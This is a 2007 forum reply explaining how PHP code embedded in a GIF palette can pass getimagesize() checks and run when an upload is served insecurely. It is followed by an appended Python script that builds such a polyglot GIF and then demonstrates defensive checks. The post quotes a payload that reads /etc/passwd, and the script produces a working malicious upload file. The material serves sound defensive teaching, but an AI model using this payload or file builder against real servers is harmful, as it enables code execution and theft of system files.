Re: GIF PHP Exploit

Posted by Manuel Lemos on 06/23/07 22:12

Hello,

on 06/23/2007 08:25 AM Jerry Stuckle said the following:
>>>> It's been mentioned here a couple of times in different threads
>>>> regarding image uploading. It's not new, but I found a clear
>>>> explanation of what it is and how to deal with it. Hope it helps
>>>> some of you.
>>>>
>>>> http://www.phpclasses.org/blog/post/67-PHP-security-exploit-with-GIF-images.html
>>>>
>>>>
>>>>
>>>> Best!
>>>> Sh.
>>> How is this exploit related specifically to GIF files? You can insert
>>> PHP code in any file, and every upload script that doesn't check file
>>> extensions is vulnerable.
>>
>> It is explained in the article. You can upload a specially crafted GIF
>> image that embeds PHP code. Many developers use the PHP getimagesize()
>> function to validate that the image is a GIF (or another type). The
>> getimagesize function will not fail, because the crafted image is a valid
>> GIF.
>>
>> Depending on how you serve uploaded GIF files, the embedded PHP code may be
>> executed.
>>
>> Using GD image manipulation functions may not save anybody from exploits
>> because the PHP code may be embedded in the image palette space. If
>> those GD functions preserve the original palette, the embedded PHP code
>> remains there.
>>
>
> I don't know anyone in their right mind who would set up a server to
> parse gif's as PHP code.

You are missing the point. Developers are not parsing GIFs as PHP code
intentionally.

Some less informed developers are serving uploaded GIFs in insecure
ways, because that triggers the execution of PHP code that may be embedded
inside the GIF data, for instance as a stream of bytes in the GIF
palette, like this:

GIF89a other binary data and then GIF palette here<?php
readfile('/etc/passwd'); ?> more binary data.

That is explained in the article.

--

Regards,
Manuel Lemos

Metastorage - Data object relational mapping layer generator
http://www.metastorage.net/

PHP Classes - Free ready to use OOP components written in PHP
http://www.phpclasses.org/
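The mechanism described in this thread, as an added example (Python, not code from the thread, from Jerry Stuckle or Manuel Lemos, or from the PHP Classes article): the script builds a decodable 1x1 GIF89a whose global color table holds PHP source bytes, shows that a header-only check of the kind getimagesize() performs for GIF (signature plus logical screen descriptor) still reports a valid image, and then contrasts a whole-file scan for PHP open tags with a server-side filename policy that ignores the client-supplied name. The payload text is the one quoted in the post; the file bytes, the function names and the 256-entry palette layout are choices made for this example.

```python
"""
Added example: GIF with PHP bytes in the palette versus a header-only check.
Not part of the original thread; all helpers and the file layout are assumptions.
"""
import secrets
import struct
from typing import Optional, Tuple

# Payload text as quoted in the post above; the GIF container is constructed here.
PAYLOAD = b"<?php readfile('/etc/passwd'); ?>"

# Standard 1x1 LZW image data: min code size 2, a 2-byte sub-block encoding
# clear code, pixel index 0 and end-of-information, then the block terminator.
ONE_PIXEL_DATA = bytes([0x02, 0x02, 0x44, 0x01, 0x00])


def build_gif_with_payload(payload: bytes) -> bytes:
    """Return a decodable 1x1 GIF89a whose 256-entry global color table starts
    with `payload`. Color table entries are raw RGB triples, so any byte
    sequence is acceptable there and nothing in the header reveals it."""
    if len(payload) > 256 * 3:
        raise ValueError("payload does not fit in a 256-entry color table")
    table = bytearray(256 * 3)
    table[: len(payload)] = payload
    header = b"GIF89a"
    # Logical screen descriptor: width, height, packed flags (global color
    # table present, 2^(7+1) = 256 entries), background index, aspect ratio.
    lsd = struct.pack("<HHBBB", 1, 1, 0x80 | 0x07, 0x00, 0x00)
    # Image descriptor at (0,0), 1x1, no local color table.
    image_descriptor = b"," + struct.pack("<HHHHB", 0, 0, 1, 1, 0x00)
    return header + lsd + bytes(table) + image_descriptor + ONE_PIXEL_DATA + b";"


def gif_size_like_getimagesize(data: bytes) -> Optional[Tuple[int, int]]:
    """Mimic the depth of the GIF check getimagesize() performs: signature plus
    the logical screen descriptor. The color table bytes are never inspected."""
    if len(data) < 13 or data[:6] not in (b"GIF87a", b"GIF89a"):
        return None
    width, height = struct.unpack("<HH", data[6:10])
    return width, height


def global_color_table(data: bytes) -> bytes:
    """Slice out the global color table using the packed flags byte."""
    if gif_size_like_getimagesize(data) is None:
        return b""
    flags = data[10]
    if not flags & 0x80:
        return b""
    entries = 2 ** ((flags & 0x07) + 1)
    return data[13 : 13 + 3 * entries]


PHP_OPEN_TAGS = (b"<?php", b"<?=", b"<?")


def contains_php_open_tag(data: bytes) -> bool:
    """Heuristic scan of the whole upload. It catches this payload, but the bare
    "<?" form can occur by chance inside compressed pixel data, and the attacker
    controls every palette byte, so treat it as a tripwire, not a guarantee."""
    return any(tag in data for tag in PHP_OPEN_TAGS)


def storage_name_for(data: bytes) -> Optional[str]:
    """Server-chosen filename for an accepted upload. The client-supplied name
    and extension are discarded, so names such as 'x.php.gif' or 'x.php' never
    reach disk. The file must still be stored where the web server does not
    hand files to the PHP interpreter."""
    if gif_size_like_getimagesize(data) is None:
        return None
    return secrets.token_hex(16) + ".gif"


if __name__ == "__main__":
    crafted = build_gif_with_payload(PAYLOAD)
    print("header check:", gif_size_like_getimagesize(crafted))          # (1, 1): accepted
    print("payload in palette:", PAYLOAD in global_color_table(crafted))  # True
    print("scan finds tag:", contains_php_open_tag(crafted))              # True
    print("stored as:", storage_name_for(crafted))
```

The header check accepts the crafted file because the payload lives in a region whose contents are free-form by design, which is the point made in the thread. The scan is only worth running on whatever bytes are actually written to disk: if the upload is re-encoded through an image library that preserves the original palette, as the post warns GD may, the tags survive re-encoding and the scan will still find them. The filename policy addresses the other half of the problem, since the file only executes if the web server or the application itself treats it as PHP, for instance by including it or by mapping the attacker's chosen extension to the PHP handler.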
